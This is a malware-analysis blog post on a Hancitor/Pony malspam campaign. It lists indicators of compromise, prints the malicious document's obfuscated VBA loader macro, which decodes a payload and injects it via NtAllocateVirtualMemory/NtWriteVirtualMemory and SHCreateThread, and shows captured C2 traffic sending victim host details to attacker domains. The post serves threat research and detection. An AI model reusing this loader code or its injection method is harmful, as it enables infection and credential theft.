In this post I was able to investigate a Hancitor/Pony/zloader malspam message. Looking around for some more information about this infection, I was able to find the following links:
– Brad’s SANS ISC Blog post talking about this exact malspam:
– Hybrid Analysis’ report for another example of this malspam:
– Looking at the Virustotal comments, I saw Techhelplist had commented about this and then looked for the Tweet:
As usual, all the artifacts, the PCAP, and ProcMon log can be found in my Github repo for this investigation here.
After posting this blog entry out on Twitter, David Ledbetter sent me an update letting me know that MalwareBytes had covered another maldoc that was the same as the one here. For that great write-up please see there blog here.
Indicators of Compromise:
api.ipify[.]org /
hedthowtorspar[.]com /
sy-nitron[.]pl /
rowatterding[.]ru /
checkip.dyndns[.]com /
checkip.dyndns[.]com /
File name: eFax_kyle.haley.doc
File size: 197KB
MD5 hash: ea664510dbc15aa2bd1d865cdd771a58
Virustotal :
First detection: 2017-01-25 15:14:37 UTC
Detection ratio: 21 / 55
File name: akpeydzais.crt
File size: 1.0KB
MD5 hash: c64eef3e401928160b498c5042617a39
Virustotal: NA
File name: certutil.exe
File size: 102KB
MD5 hash: 0c6b43c9602f4d5ac9dcf907103447c4
First detection: 2012-09-08 17:53:10 UTC
Detection ratio: 0 / 56
File name: freebl3.dll
File size: 217K
MD5 hash: 269beb631b580c6d54db45b5573b1de5
First detection: 2013-02-05 15:36:34 UTC
Detection ratio: 0 / 54
File name: libnspr4.dll
File size: 195KB
MD5 hash: 6e84af2875700285309dd29294365c6a
First detection: 2013-02-05 15:36:35 UTC
Detection ratio: 0 / 57
File name: libplc4.dll
File size: 14KB
MD5 hash: 1fae68b740f18290b98b2f9e23313cc2
First detection: 2013-03-22 18:37:04 UTC
Detection ratio: 0 / 56
File name: libplds4.dll
File size: 12KB
MD5 hash: 9ae76db13972553a5de5bdd07b1b654d
First detection: 2014-01-22 13:27:20 UTC
Detection ratio: 0 / 56
File name: msvcr100.dll
File size: 756KB
MD5 hash: 0e37fbfa79d349d672456923ec5fbbe3
First detection: 2011-08-10 17:05:25 UTC
Detection ratio: 0 / 56
File name: nss3.dll
File size: 780KB
MD5 hash: a1c4628d184b6ab25550b1ce74f44792
First detection: 2013-03-22 18:52:21 UTC
Detection ratio: 0 / 56
File name: nssdbm3.dll
File size: 106KB
MD5 hash: 051652ba7ca426846e936bc5aa3f39f3
First detection: 2013-12-23 13:43:20 UTC
Detection ratio: 0 / 56
File name: nssutil3.dll
File size: 92KB
MD5 hash: c26e940b474728e728cafe5912ba418a
First detection: 1 / 57
Detection ratio: 2013-12-23 13:43:24 UTC
File name: smime3.dll
File size: 96KB
MD5 hash: a5c670edf4411bf7f132f4280026137b
First detection: 2014-01-22 13:29:10 UTC
Detection ratio: 0 / 56
File name: softokn3.dll
File size: 169KB
MD5 hash: 2ab31c9401870adb4e9d88b5a6837abf
First detection: 2014-01-22 13:29:49 UTC
Detection ratio: 0 / 56
File name: sqlite3.dll
File size: 414K
MD5 hash: b58848a28a1efb85677e344db1fd67e6
First detection: 2013-02-05 15:36:47 UTC
Detection ratio: 0 / 57
File name: vele.tal
File size: 190KB
MD5 hash: 0f2f862c23fbfe43189702a79d2fd969
Virustotal: NA
File name: oqluy.php
File size: 3.0KB
MD5 hash: 2c2e142b8d99829a9282647343a24f62
Virustotal: NA
File name: php.exe
File size: 28KB
MD5 hash: 4f060d308f8ebdc888c88d94e615d60f
First detection: 2011-08-14 13:21:10 UTC
Detection ratio: 0 / 56
File name: php5ts.dll
File size: 5.5MB
MD5 hash: 7356593dd0b80023e0b416e66382b63c
First detection: 2011-11-01 20:45:32 UTC
Detection ratio: 0 / 56
When the user gets this email, they are asked to view the eFax at the URL in the email which actually points to “hxxp://” as seen in the image above. Once the user clicks on this link they are prompted to download and save an Office Word doc.
GET /api/get.php?id=a3lsZS5oYWxleUByYWNrc3BhY2UuY29t HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Accept-Encoding: gzip, deflate Host: DNT: 1 Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Jan 2017 15:51:21 GMT Content-Type: application/msword; Transfer-Encoding: chunked Connection: keep-alive Content-Disposition: attachment; filename=eFax_kyle.haley.doc Pragma: private Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Expires: Tue, 16 Jun 2020 20:00:00 GMT
Using OfficeMalScanner I was able to pull 3 files out of it that looked suspicious according to OfficeMalScanner. The following are 2 of those 3 files but are still obfuscated.
selfaddressed: ============== Attribute VB_Name = "selfaddressed" ' And when I doubt ' You remind me of just how lucky I am ' Because it's the hardest thing I've ever done #If Win64 Then ' You remind me of just how lucky I am ' You always seem ' Because it's the hardest thing I've ever done Public Declare PtrSafe Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal saxony As LongPtr, ByVal abuna As Any, ByVal sarawakian As LongPtr, ByVal salmo As LongPtr) As LongPtr ' You surprise me with ' Sometimes I doubt the path I chose ' And my bad examples Public Declare PtrSafe Function appreciably Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal heraldry As LongPtr,algometry As LongPtr,blowfly As LongPtr,bruin As LongPtr,conclusive As LongPtr) As Boolean ' You're my belief ' Sometimes my dreams feel all on hold ' There's no doubt that this will make me strong Public Declare PtrSafe Function ascription Lib "Shell32.dll" Alias "SHGetDesktopFolder" (myoma As LongPtr) ' If you are dreaming ' Just how perfect you are ' Just how perfect you are Public Declare PtrSafe Function distended Lib "Kernel32.dll" Alias "LocalFree" (literati As LongPtr) As LongPtr ' Just how perfect you are ' The stronger one ' Because it's the hardest thing I've ever done Public Declare PtrSafe Function discoglossidae Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (cristobalite As LongPtr, dummy As LongPtr, ByVal welloff As LongPtr,pharisaismByVal As LongPtr, accipiter As LongPtr, ByVal ar As LongPtr) As LongPtr ' If you are dreaming ' You surprise me with just how perfect you are ' You remind me of just how perfect you are Public Declare PtrSafe Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal chippendale As Any, ByVal chudder As Any, ByVal elbows As Any, ByVal churchdoor As Any, ByVal pyrrhus As Any) As LongPtr ' You remind me of just how lucky I am ' Even with all my flaws ' You surprise me with just how perfect you are Public Declare PtrSafe Function already Lib "Shell32.dll" Alias "SHGetSettings" (freshet As LongPtr,caruncle As LongPtr) As LongPtr ' I never want to wake you up ' Out in the world that's beyond my control ' When I'm at my wit's end Public Declare PtrSafe Function atlantes Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (vat As LongPtr, abutter As Any,haystack As LongPtr, fit As Any) As Boolean ' Because it's the hardest thing I've ever done ' I'm suppose to be ' I never want to wake you up ' I never want to wake you up ' ' You search for me #Else ' The stronger one ' And when I'm lost ' I'm suppose to be Public Declare Function solanum Lib "Kernel32.dll" Alias "LocalFree" (spartan As Long) As Long ' You're my belief ' You always seem ' Still, I hold my breath each time you go Public Declare Function bargainpriced Lib "Shell32.dll" Alias "SHGetSettings" (geared As Long, followon As Long) As Long ' Just how perfect you are ' ' And my bad examples Public Declare Function toastmaster Lib "Shell32.dll" Alias "SHGetDesktopFolder" (aedes As Long) ' Sometimes my dreams feel all on hold ' Because it's the hardest thing I've ever done ' And I'm losing my head Public Declare Function latimeridae Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (gorgonocephalus As Long, gradeconstructed As Any, beelzebub As Long, lhonneur As Any) As Boolean ' Because it's the hardest thing I've ever done ' You're my belief ' Sometimes my dreams feel all on hold Public Declare Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal affirm As Long, ByVal panonychus As Any, ByVal losing As Any, ByVal harmonically As Any) As Long ' You surprise me with just how perfect you are ' Because it's the hardest thing I've ever done ' You're my belief Public Declare Function chimakum Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal conversation As Long, hello As Long, reovirus As Long, skater As Long, givenness As Long) As Boolean ' And I'm losing my head ' And when I'm lost ' You remind me of just how lucky I am Public Declare Function discoglossidae Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (flexible As Long, endodontist As Long, ByVal allocution As Long, bissextileByVal As Long, dragonnade As Long, ByVal gangrenous As Long) As Long ' You surprise me with ' You remind me of just how perfect you are ' You surprise me with just how perfect you are Public Declare Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal accueil As Any, ByVal collapsible As Any, ByVal romanian As Any, ByVal hejira As Any, ByVal sorceress As Any) As Long ' Still, I hold my breath each time you go ' Just how perfect you are ' To prove that theory wrong ' I'm suppose to be ' And when I doubt ' The stronger one #End If ' You surprise me with ' Still, I hold my breath each time you go ' And my bad examples Function bifilar(emperor) bifilar = AscW(emperor) End Function Function nonsuccess(caboose) As String Dim coltsfoot As Variant checkpoint = ail Dim remonetize As Integer Dim sembarquer(63) As Long Dim cuban As Long Dim blackberry As String Dim indisputable(63) As Long Dim gracilariid As Long Dim deuterogamy As Variant Dim kudzu(6965) As Byte Dim ichneumon(63) As Long Dim sidewheeler As Long Dim rower As Long affably = Rnd(363.395 + 288.6023) Dim regiment As Variant Dim bootlace() As Byte catchpenny = "gouache" dithering = 16 + 104 - 86 + 16515038 Dim aztreonam As Long allhallows = 255 proctor = 64 caredfor = 33 + 5 + 65242 testaceology = 262144 Dim albification As Variant Dim gainful As Variant hesitancy = 258048 nervousness = 4032 luger = 63 slog = 79 + 4017 ambergris = 62 + 59 + 77 + 16711482 gvisum = 126 + 117 + 13 cymbid = 65536 Dim affluence As Long palace = 53 - 53 armorclad = 51 - 53 + 7461 Dim gilbert() As Byte gilbert = VBA.StrConv(caboose, vbFromUnicode) Dim markbelow As String fierily = 16 oiling = 12156 outspeak = 374597 oiling = Pmt(0.068, fierily, -22301, outspeak, 0) fain = 7459 lanthanum = 35 authenticate = Log(100) / Log(10) + 14 For affirmance = 0 To fain If affirmance Mod 2 = 0 Then gilbert(affirmance) = gilbert(affirmance) + authenticate Else gilbert(affirmance) = gilbert(affirmance) + authenticate - 1 End If Next affirmance steprelationship = 37 platyrrhini = 13272 ingenuousness = 253747 cheekbone = SLN(ingenuousness, platyrrhini, steprelationship) remonetize = 0 schemist = 0 filigree = 43 pipelaying = immunity For gracilariid = 0 To 63 indisputable(gracilariid) = choriotis(gracilariid, proctor, 3) sembarquer(gracilariid) = choriotis(gracilariid, slog, 3) ichneumon(gracilariid) = choriotis(gracilariid, testaceology, 3) Next gracilariid chrome = 99 moo = 18434 braise = 504435 moo = Pmt(0.066, chrome, -36184, braise, 0) bootlace = gilbert childcare = 37 + 77 + 42 - 152 chionanthus = 39 photomechanical = 21321 loyalty = 164804 prepared = SLN(loyalty, photomechanical, chionanthus) basilica = 3 checkpoint = checkpoint ammodytes = VBA.Math.Round(198.4053 + 497.5379) aggressiveness = basilica + 1 airy = 2 For rower = 0 To fain cretin = bootlace(rower) deceleration = bootlace(rower + 2) sidewheeler = ichneumon(pipelaying(cretin)) _ + sembarquer(pipelaying(bootlace(rower + 1))) + indisputable(pipelaying(deceleration)) + pipelaying(bootlace(rower + basilica)) gracilariid = choriotis(sidewheeler, ambergris, 2) kudzu(cuban) = choriotis(gracilariid, cymbid, 1) gracilariid = choriotis(sidewheeler, caredfor, 2) kudzu(cuban + 1) = choriotis(gracilariid, gvisum, 1) kudzu(cuban + airy) = choriotis(sidewheeler, allhallows, 2) cuban = cuban + airy + 1 rower = rower + 3 Next nonsuccess = kudzu End Function Function immunity() Dim dicta(255) As Byte nephew = 65 Do dicta(nephew) = nephew - 65 nephew = nephew + 1 Loop Until nephew = 91 nephew = 48 Do dicta(nephew) = nephew + 4 nephew = nephew + 1 Loop Until nephew = 58 nephew = 97 Do dicta(nephew) = nephew - 71 nephew = nephew + 1 Loop Until nephew = 123 dicta(47) = 63 nephew = 43 dicta(nephew) = 62 immunity = dicta End Function Function choriotis(anxiousness, tuille, capillarity) Select Case capillarity Case 1 choriotis = anxiousness \ tuille Case 2 choriotis = anxiousness And tuille Case 3 choriotis = anxiousness * tuille End Select End Function Sub add() With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _ .PageNumbers .IncludeChapterNumber = True .ChapterPageSeparator = wdSeparatorEnDash End With End Sub ------------------------------------------------------ ------------------------------------------------------ ThisDocument: ============= Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim marbled As Long Dim philosophy As Variant ceruse = "movableness" predestine neutrino = 46 uncleanly = 16906 alundum = 229440 blearedness = SLN(alundum, uncleanly, neutrino) End Sub Sub predestine() Dim epizoic As Variant Dim endoscopy As String lowrise = ThisDocument.ComputeStatistics(wdStatisticPages) = lowrise + 9 localized = "inconceivableness" diestrus = "things" baldness = "de" & "meri" & "t" Set putdown = vehement = 15 jacksonian = 33516 heavensent = 411417 manis = SLN(heavensent, jacksonian, vehement) khamti = putdown.Name capillata = 118 + 50 + 7292 landwehr = Right(khamti, capillata) colleen = selfaddressed.nonsuccess(landwehr) casing = 7 come = 9798 augusta = 239618 come = Pmt(0.071, casing, -2400, augusta, 1) alleviation = "embarrass" amsonia = "dem" & "onetization" #If Win64 Then Dim maturational As Long Dim condense As LongPtr Dim ean As LongPtr Dim workweek As Integer #Else Dim hooflike As Byte Dim ean As Long Dim huff As Variant Dim condense As Long #End If chalice = 0 impudence = "mesoderm" grapnel = 4096 aboideau = 29 america = 27171 adamantine = 169122 america = Pmt(0.0765, aboideau, -24239, adamantine, 1) trichotomy = "acknowledgeable" jeroboam = "easternmost" awayness = "symptom" cryptoprocta = 32 woodworm = 37179 pinned = 158715 loire = SLN(pinned, woodworm, cryptoprocta) precautions = colleen somali = "servans" unquestioning = "aoritis" condense = tytonidae(precautions) tracasserie = "propriety" bushtit = "judiciary" #If Win64 Then Dim indecisively As Integer Dim monsoon As LongPtr Duplicate = "faultfinding" embezzle = "spleenish" effigies = "disdainfully" Dim furfur As LongPtr flailing = 33 - 33 + 1280 #ElseIf Win32 Then melodically = "menispermaceae" phonics = "delawarean" selfdenial = "niceness" Dim monsoon As Long arrest = 36 + 478 Dim furfur As Long flailing = arrest + 3204 #End If Dim auricularia As Long Dim bouleverser As String monsoon = 104 + 23 - 127 ean = condense + flailing furfur = 1 trisulcate = unapprized(ean, monsoon, furfur, monsoon) nnumber = 42 biretta = 21067 applejack = 321359 equate = SLN(applejack, biretta, nnumber) End Sub Function tytonidae(mender) Dim aeciospore As Long Dim spinelessness As Integer Dim cubic As String Dim nacimiento As Variant #If Win64 Then Dim cakile As Byte Dim claustrophobic As LongPtr unclutch = 8 Dim dodo As String Dim debriefing As LongPtr Dim missay As Integer Dim atonality As LongPtr Dim pants As Integer #Else Dim choregus As Long Dim claustrophobic As Long unclutch = 4 Dim debriefing As Long Dim milkman As String Dim atonality As Long Dim toxicodendron As String Dim exemplary As Long #End If caryatid = catsear(VarPtr(claustrophobic), VarPtr(mender) + 8, unclutch) operate = -1 debriefing = 0 feminate = 0 atonality = 29 - 59 + 31 + 9587 hepaticopsida = 34 + 75 + 88 + 3899 equipollent = 40 + 24 depose = discoglossidae(ByVal operate, debriefing, ByVal feminate, atonality, ByVal hepaticopsida, ByVal equipollent) affably = ammodytes / 287 affably = affably - 358 catsear debriefing, claustrophobic, 60 + 5534 catenation = 43 capriole = 29517 nuances = 302286 autologous = SLN(nuances, capriole, catenation) tytonidae = debriefing End Function Sub upper() Dim InitialCaps As Range Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _ End:=ActiveDocument.Words(3).End) InitialCaps.Case = wdUpperCase End Sub Function catsear(quidem, apopemptic, bonnily) #If Win64 Then Dim pyocyanase As Variant Dim chancellorsville As String Dim algorism As LongPtr Dim sediment As LongPtr Dim belemnitidae As LongPtr Dim chasser As String Dim thuggery As LongPtr Dim detachment As LongPtr #Else Dim sediment As Long Dim primitively As Integer Dim algorism As Long Dim ballot As Integer Dim thuggery As Long Dim amrinone As Byte Dim belemnitidae As Long Dim pathway As Variant Dim detachment As Long Dim almanac As Variant Dim abient As Integer #End If checkpoint = matutinal affably = Fix(117.376 + 114.2197) sediment = quidem detachment = bonnily ail = ail thuggery = apopemptic huffing = 16 crisis = 28804 nasally = 141610 coagency = SLN(nasally, crisis, huffing) matutinal = catchpenny algorism = 96 + 109 + 87 - 293 carnally ByVal algorism, sediment, thuggery, detachment, belemnitidae affably = ammodytes And 451 End Function
Once the macro has been enabled allowing the malicious code to run, most of the traffic is done over port 80 and no other non-standard ports. The first URL that is contacted is api[.]ipify[.]org to obtain the public IP address of the system.
GET / HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: Cache-Control: no-cache HTTP/1.1 200 OK Server: Cowboy Connection: keep-alive Content-Type: text/plain Date: Wed, 25 Jan 2017 15:57:01 GMT Content-Length: 14 Via: 1.1 vegur
From here there are a couple of different C2s that my infected VM started to callback to via either GET or POST calls. Some of the callbacks are to the domain hedthowtorspar[.]com with details of my system.
POST /ls5/forum.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: Content-Length: 110 Cache-Control: no-cache GUID=9259187252584972296&BUILD=2501&INFO=OPTIMUS @ OPTIMUS\Administrator&IP= HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Wed, 25 Jan 2017 15:57:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.45 3e4 FTGUARZAEg4OCkBVVQkDVxQTDggVFFQKFlUNClcZFRQOHxQOVQ4SHxcfCVUODR8UDgMcExwOHx8UVQoXSwYSDg4KQFVVGxkeGRYPGAlUGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVULDxMZEVcJHw4PClUKF0sGEg4OCkBVVRkNFx8AG1QZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQwTHh8VVwkTFhVXGA8TFh4fCFdLVExUSVUKF0sGEg4OCkBVVR4IDxcJVxUPDhYfDlQZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQ0VCB4YGwNVChdLBhIODgpAVVUdFRAVERsTVw4IFQ8YFh9UGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVUZFRQOGxkOVxwVCBdXTVUXFR4PFh8JVQoXSwYSDg4KQFVVEhsIHwgPAxsWExwfVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVHB8fHg0VCB4KCB8JCVUKF0sHAQhAEg4OCkBVVQkDVxQTDggVFFQKFlUNClcZFRQOHxQOVQ4SHxcfCVUODR8UDgMcExwOHx8UVUhPSksGEg4OCkBVVRsZHhkWDxgJVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVCw8TGRFXCR8ODwpVSE9KSwYSDg4KQFVVGQ0XHwAbVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVDBMeHxVXCRMWFVcYDxMWHh8IV0tUTFRJVUhPSksGEg4OCkBVVR4IDxcJVxUPDhYfDlQZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQ0VCB4YGwNVSE9KSwYSDg4KQFVVHRUQFREbE1cOCBUPGBYfVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVGRUUDhsZDlccFQgXV01VFxUeDxYfCVVIT0pLBhIODgpAVVUSGwgfCA8DGxYTHB9UGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVUcHx8eDRUIHgoIHwkJVUhPSksH 0 ----- POST /klu/forum.php HTTP/1.0 Host: Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 2635 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) ... ..>.b..%v.......%.I.<.].9% #.d.....g..y.....W..g.....t....'...T..Y<0EpG/......:...I.......".?P. YX#..f.....I.P.f....?U.J....O.y...G...<j..z.&.@HA..*<B ..=.&.S..O...Q.... ..o.P.n.W....s.U..K ..>.v.......uY.......fw._...N...c.'...+6......A{&...........^.O...:6^.:\.........~|I(.).6.<.O.ow.....i..|j.?;..Ur..w=.......M.p....+..T.9. 9.|.{..,_.......s/.S.t;.?...].5......Y+.]p....a...;...[d_.w...-a_.U=.O ..o......67... .sZ.I}..a..j......q.....D.8....x.D.5H......Z.r.[j....M.}...'i!...&nq.......m<.s..>...................&.D.}.%......V....l.....D.........E'iXG.|.b.....tW..n.....YN....g.@s.....:..\.P..G .......N.O...E....Z......w>^....T..#..d.$.Y.../.Y2l...Qi7...A......<....+#...y.B..6@...^G.E...t'.....!O..p.'b!.W%}..2[..9..9./.m..6...x5~. .*[..s..J.Rt".......w6...m!....;W.(n:[.......8..E..... _....(....A_...$..!Ijl..Jf.'}..iQ....c.....5>H.|...tR.[...3...v......`.$T....E.Uv8J".Y.........U.m..1..:A%.z@...,...~!..wDM.+...)N;.. .`),...l....nN.^...9.G.A.@......'....?P.._..V}..h.$f... G....5r..G....g.j.}R5.K....`U...F.].u.*...Z.)g.... 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HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Wed, 25 Jan 2017 15:57:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.4.45 ..d!t..kf...w02.J... ----- POST /ls5/forum.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: Content-Length: 110 Cache-Control: no-cache GUID=9259187252584972296&BUILD=2501&INFO=OPTIMUS @ OPTIMUS\Administrator&IP= 200 OK Server: nginx/1.6.2 Date: Wed, 25 Jan 2017 15:59:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.45 c CQJXARRABw== 0
We also see some GET requests to the domain sy-nitron[.]pl.
GET /wp-content/themes/twentyfifteen/pm1 HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: Cache-Control: no-cache HTTP/1.1 200 OK Date: Wed, 25 Jan 2017 15:57:03 GMT Server: Apache/2 Last-Modified: Wed, 25 Jan 2017 12:56:37 GMT ETag: "5e60f5c-b4fb-546eac3573e11" Accept-Ranges: bytes Content-Length: 46331 Connection: close Content-Type: text/plain ...Tm]y.....7.y.....i]I.....meT....ltm....<REST OF PACKET> ----- GET /wp-content/themes/twentyfifteen/2501 HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: Cache-Control: no-cache HTTP/1.1 200 OK Date: Wed, 25 Jan 2017 15:57:13 GMT Server: Apache/2 Last-Modified: Wed, 25 Jan 2017 12:56:52 GMT ETag: "5e60f5f-2c8fe-546eac4414ff0" Accept-Ranges: bytes Content-Length: 182526 Connection: close Content-Type: text/plain ...T.,@?..X.#,C?...T.,.....T.,@?..UT.,@?...T.,@?...T.,@?...T.,@?...T.,.?..E..,.>...,.t@?...T.,.?...U.,@...<REST OF PACKET>
Lastly we see callback activity to the site rowatterding[.]ru via some POST requests and then a call to the site to get my IP address.
POST /bdk/gate.php HTTP/1.1 Accept: */* Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: Content-Length: 908 Connection: Close .%....2. ...\M..Y..=K..rB\h..2..v....(b.....G....0..c........).D...%>.n...S.....+.dO.]z...c2.&..HEt'N.#a1...q..H.c2]|-.....S..VkXs...[...5 ..20...84.....?.E..3z..y.m.P..&.'-84.......-..Yo".`#....}...P..#....`h...A......l...\......u8.5..H.....A).?....|S.F.Q.........;{...# ..c.(......X..,. .. B......Z..4 G.Lh...L.. ..F...`..Q.sHh..$...'. .x.K..C..!E..~> ..(....q.Sr..D...F.A........9C..%.*..H........^g.c...{t.M.>sb3.@M.....'...7..e.)....@....D..@.[2..4.....\&....Y..:....d....K....7.u.o.t.}._..I.....D....Z./....%.r..A.Hu...K.....j8..V..;...J......5e.....{..8..H.3n.....+.....H........;.+......=.Ur....6.H...m.IE..;Oe3~..4....6(.?..7..?......l`..a'm%...(.L...mX%.As..j`...v...%.p....v.=)..>q..b. $~..`.....n...1S..F....4.VF......jl.r...I.<....K.,.>...'^..m...w..w.+H*..[..>l.'.nP2iZH-..Bl;Bd...X..y...$V..w.O?.fEnF ..].M..T.%..^...V.N.%....W..4j' .....i.d..2.V.v....1..2..M.,-..U..[f.`..c\d....E.. HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Wed, 25 Jan 2017 15:57:15 GMT Content-Type: application/octet-stream Content-Length: 7186892 Connection: close X-Powered-By: PHP/5.4.45 Content-Description: File Transfer Content-Disposition: attachment; filename=tv.dat Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public <].#..U7q.v....?rE^.i..S...)..L..rO...y!.........d...TxY..-G|.w.\^$..).......<REST OF PACKET> ----- POST /bdk/gate.php HTTP/1.1 Accept: */* Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: Content-Length: 1060 Connection: Close .'.L.v....@.P....A.h.I0.....O.I..=.. ..R.&...,yqW.SV.Y=L...>M.Y. aC........1.wX'....|..<yg....:...........u%.T..f.....i.......p....!T..u..'..YzdM.....t....f..hY.&..(.<";r..Si....^?.....R....#.#h.....u..h.e.>..=..&..~.t...(.Q>.;`^7.7n....Y..A...y.L....Cr1.N.Cz...0Ed. .m.K...hvY.......w.L."..D>.D......3....y..8..%.^.!..-....z..N..w.>d.....F.....D.;..)."3V2..j ........=|.....1P.....m.9.i.+..w...OK.{A...N.X...`g.Z.'....WT...b...>?.gB.E.w...X.....Wz.....%@....d.@..;.y..%..Mf...T......... .."K..2w...0......e..<....o...v...........`.o.)Xo.... .s.....g}.....t.......d5]".,..9...C......Fb...A..5.a..H..x[J.&D...~"k%....e[... .pd..u..~..j:..=9[...e.uH.S..ZS.w.8...7..P.1...#...U'...[..MD< .....kN.......B..{x.....J....:.O..I..1.)*66.........!XR]P|...m....Z.A.........j.. ....k...0..>......0.....2...\..+.H?.C....V4f..K2$...........&v..I}?.$..`.......#.@............dJ`Y[R(....4.Et.g.h.<;.x.....(.^+689.....Y...2..m..q0...F`..N...;..F....J{?..<...H".Y..G.........#..7..DN.........a.-B.....i...<....QR8........S..'.....:.f... z.s..I...uKA....h.\.. ..T..*.p6q. HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Wed, 25 Jan 2017 15:57:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.45 e35 ...x4B..'..m...Np8..N..xHVb..=.......@..z;...q...q.." +.Cdks....A^.|H..m....Ln....vzf......D.u......jmvv.Yc.i.X:.....D..........]P.F...lRP{.A..a.@.. T!U..4 .S.}.G..Fj.......'U....r......Jz .M ...../ZP.g...z........q82.>:....3.."..Q`86.O...f=...+.2.....u4.B.h...6...7.[.q..V5 ly....L..k}. .'-!..^..!......DN...&...Y.^:.i. <REST OF PACKET> ----- GET / HTTP/1.1 Accept: */* Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: Cache-Control: no-cache HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 106 <html><head><title>Current IP Check</title></head><body>Current IP Address:</body></html>
With more POST requests once the IP address has been obtained.
POST /bdk/gate.php HTTP/1.1 Accept: */* Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: Content-Length: 677 Connection: Close .........?...G]..(v..E<.....M.K."`'.m.y..Ac..3.......Wx.....\...YG..<..5....."....U.7t..F.....I.92....P.....z..h..:.QwT....=y... .Q.KN.....>. J.7).v[=....VY..........4..@.....z..w.~w[.q\..k...t.D(....=.;`b...g....b...|X.I.U+x.X+..i..F.wN..z.......<..........a}AK...o.y...K.$b.v=.@.,.....NM#....f4..+5...V01..H.>...}<..r[ .).....%j....dpK.AxR.Y.ap.....j..3..Q...9 T.....Fhf.ez...8ABF.K...bH.IM......I.U.DQ2........l..]K.!$.5..."....u.QL.....).........b7...V......S...R..F.C...;Z..^.5......D*6b..0........#.#Xq....i.x...>..1.... ....:.?.u$.V.d.........*6.w....%.yZ...K0.$..-.....:......1........YE.....<....@...e..P.D.,..V....M........H...S.?........Il+p HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Wed, 25 Jan 2017 15:58:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.45 5ae ....]820...".wQ..DOu ..5../L.y.U..a..!..>.C.6*......B...7......e...'-.Z?&'e......(P{.Kl...P......rC...........B}.W.iY..(.R.......... .....I..) WD]....c..i.........)..........0(.:..."].q.R.;6.....BG<...{.....6...4.......(.....M......,_ 